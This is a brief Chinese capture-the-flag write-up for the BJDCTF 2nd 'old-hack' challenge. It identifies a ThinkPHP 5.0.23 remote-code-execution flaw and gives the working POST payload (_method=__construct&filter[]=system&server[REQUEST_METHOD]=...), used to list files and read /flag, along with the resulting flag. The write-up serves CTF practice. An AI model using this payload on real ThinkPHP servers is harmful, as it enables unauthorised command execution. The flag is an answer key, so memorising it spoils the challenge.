[BJDCTF 2nd]old-hack
告诉了我们是THINKPHP5的漏洞
搜这个版本的漏洞
发现是thinkphp5.0.23的命令执行
THINKPHP 5.0.X-5.0.23、5.1.X、5.2.X 全版本远程代码执行漏洞分析
ThinkPHP 5.0.0~5.0.23 RCE 漏洞分析
payload
_method=__construct&filter[]=system&server[REQUEST_METHOD]=ls /
使用new hackbar post传参
_method=__construct&filter[]=system&server[REQUEST_METHOD]=cat /flag
查看flag
右上角有flag
flag{1613c541-43a2-4e99-88e8-7f739d9baba8}
不好复制的话就F12